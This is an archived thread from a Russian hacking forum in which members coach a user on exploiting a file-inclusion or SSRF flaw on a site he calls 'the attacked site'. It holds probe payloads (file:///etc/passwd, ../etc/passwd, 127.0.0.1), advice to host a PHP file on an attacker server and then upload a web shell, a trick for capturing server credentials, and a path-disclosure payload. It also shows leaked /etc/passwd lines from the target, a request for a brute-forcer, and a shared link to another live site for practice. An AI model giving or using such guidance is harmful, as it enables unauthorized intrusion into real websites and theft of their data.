Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   File include[помощь] (https://forum.antichat.xyz/showthread.php?t=443053)

sinfo 11.10.2016 20:01

Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=http://hack.ru/phpinfo.php открывает пхп инфо моего сайта(hack).

BabaDook 11.10.2016 20:05

Цитата:

Сообщение от sinfo
sinfo said:

Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=
http://hack.ru/phpinfo.php
открывает пхп инфо моего сайта(hack).

Так и должно быть.. Ну не совсем может там не инклуд вовсе

sinfo 11.10.2016 20:07

Цитата:

Сообщение от BabaDook
BabaDook said:

Так и должно быть

Ну а как мне увидить phpinfo атакуемого сайта?

t0ma5 11.10.2016 20:15

Цитата:

Сообщение от sinfo
sinfo said:

Ну а как мне увидить phpinfo атакуемого сайта?

а зачем тебе phpinfo атакуемого сайта?

вопрос вообще про инклуд сначала был

/etc/shells /etc/passwd по классике попробуй проинклудить

BabaDook 11.10.2016 20:46

Цитата:

Сообщение от t0ma5
t0ma5 said:

а зачем тебе phpinfo атакуемого сайта?
вопрос вообще про инклуд сначала был
/etc/shells /etc/passwd по классике попробуй проинклудить

Так если у него инклуд нахрена это всё,тем более если РФИ

BabaDook 11.10.2016 20:47

site.com/blablabla=

Цитата:

Сообщение от sinfo
sinfo said:

Ну а как мне увидить phpinfo атакуемого сайта?

site=i.txt

в i.txt

а что если, file:///etc/passwd || http://127.0.0.1:80

sinfo 11.10.2016 21:18

Цитата:

Сообщение от BabaDook
BabaDook said:

site.com/blablabla=
site=i.txt
в i.txt
а что если, file:///etc/passwd ||
http://127.0.0.1:80

в i.txt - открыл как текстовый тхт.

file:///etc/passwd || http://127.0.0.1:80 - нет результатов(((

BabaDook 11.10.2016 21:35

Цитата:

Сообщение от sinfo
sinfo said:

в i.txt - открыл как текстовый тхт.
file:///etc/passwd ||
http://127.0.0.1:80
- нет результатов(((

тогда это не инклуд

strelok20094 11.10.2016 23:01

так ты файл читать можешь локальный?

file:///etc/passwd

/blablabla=../etc/passwd

sinfo 12.10.2016 00:47

file:///etc/passwd да вот только что нашел,ток в другом месте

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

/etc/group

crontab:x:102:

Debian-exim:x:103:

mlocate:x:104:

ssh:x:105:

А есть брут??работающий с post запросами?

pas9x 12.10.2016 12:13

Цитата:

Сообщение от sinfo
sinfo said:

Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=
http://hack.ru/phpinfo.php
открывает пхп инфо моего сайта(hack).

Просто залей на hack.ru файл phpcode.txt с содержимым и открой в браузере site.com/blablabla=phpcode.txt . Если в странице будет присутствовать только "okay dude" то значит это реально рабочий RFI и осталось только залить шелл. Если в страницу будет тупо включено содержимое phpcode.txt вместе с тегами

korneev 12.10.2016 13:56

На самом деле больше похоже на XSRF. Т.е. сервер site.com получает URL, идет по нему, забирает контент и отдает его уже тебе.

посмотри в логах своего веб сервера на hack.com с каким юзер-агентом он приходит к тебе. можно попробовать в ответ на запрос ему отдать 401-й код - вдруг прилетят авторизационные данные. Если бы была винда - смог бы отрелеиться.

sinfo 12.10.2016 14:09

file:///etc/passwd да вот только что нашел,ток в другом месте,это у же другой запрос(пост).Вот etcpasswd нашел.Подскажите что делать дальше

BabaDook 12.10.2016 14:13

Цитата:

Сообщение от sinfo
sinfo said:

file:///etc/passwd да вот только что нашел,ток в другом месте,это у же другой запрос(пост).Вот etcpasswd нашел.Подскажите что делать дальше

ищите логи, конфиги. На самом деле я лично не одну такую уязвимость не нашёл, только в тасках. Лучше сайт выкладывайте, там может быть не includ, с как сказали раньше ссрф, а может ещё что-то

t0ma5 12.10.2016 14:53

Цитата:

Сообщение от BabaDook
BabaDook said:

ищите логи, конфиги. На самом деле я лично не одну такую уязвимость не нашёл, только в тасках. Лучше сайт выкладывайте, там может быть не includ, с как сказали раньше ссрф, а может ещё что-то

вот вот("и зачем читать passwd когда у него RFI?")

тс как бы учится, и хер знает rfi там или lfi, или вообще fopen или file_get_contents

"На самом деле я лично не одну такую уязвимость не нашёл, только в тасках"

да ладно, вчера такую нашел, просто искать надо правда там не lfi а чтение файлов через fopen, но всё же

тс, ошибки php на сайт выводятся? если да надо узнать докрут до сайта(или каким нибудь другим способом) и первым делом прочитать уязвимый скрипт

BabaDook 12.10.2016 14:56

Цитата:

Сообщение от t0ma5
t0ma5 said:

вот вот("и зачем читать passwd когда у него RFI?")
тс как бы учится, и хер знает rfi там или lfi, или вообще fopen или file_get_contents
"На самом деле я лично не одну такую уязвимость не нашёл, только в тасках"
да ладно, вчера такую нашел, просто искать надо
правда там не lfi а чтение файлов через fopen, но всё же
тс, ошибки php на сайт выводятся? если да надо узнать докрут до сайта(или каким нибудь другим способом) и первым делом прочитать уязвимый скрипт

Я вообще уже давно ничего не ищу, захожу на форум, а тут уже найдено, бери,, да пробуй раскрутить ))) Сцука, я ленивый.

t0ma5 12.10.2016 15:07

Цитата:

Сообщение от BabaDook
BabaDook said:

Я вообще уже давно ничего не ищу, захожу на форум, а тут уже найдено, бери,, да пробуй раскрутить ))) Сцука, я ленивый.

нуу лень она двигатель типа))

http://dantant.com/proxy/miniProxy.p...://google.com/

для примера, прокся типа, хотя по факту читалка файлов сам ещё толком не крутил, там какая то свалка на домене)

BabaDook 12.10.2016 15:26

Цитата:

Сообщение от t0ma5
t0ma5 said:

нуу лень она двигатель типа))
http://dantant.com/proxy/miniProxy.p...://google.com/
для примера, прокся типа, хотя по факту читалка файлов
сам ещё толком не крутил, там какая то свалка на домене)

Живого места на том сайте нету, инклуд нашёл, и заливку файлов, но версия пхп высокая

И много таких прикольных моментов. Но почему я только сейчас стал обращать на это внимания

п.с спасибо за сыль, будет чем заняться на досуге

SooLFaa 13.10.2016 15:36

Кидай таргет в ЛС.

strelok20094 14.10.2016 01:15

Цитата:

Сообщение от sinfo
sinfo said:

file:///etc/passwd да вот только что нашел,ток в другом месте
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
/etc/group
crontab:x:102:
Debian-exim:x:103:
mlocate:x:104:
ssh:x:105:
А есть брут??работающий с post запросами?

Значит смотри, если у тебя получилось прочитать локальный файл, ищи раскрытие путей например

пост в авторизации

site.com/login

post data

login[]=lol

дает нам /var/www/site.com/public_html/lol/db.php error 31 line

тогда мы имеем следующую возможность чтения

file:///var/www/site.com/public_html/index.php


Время: 13:47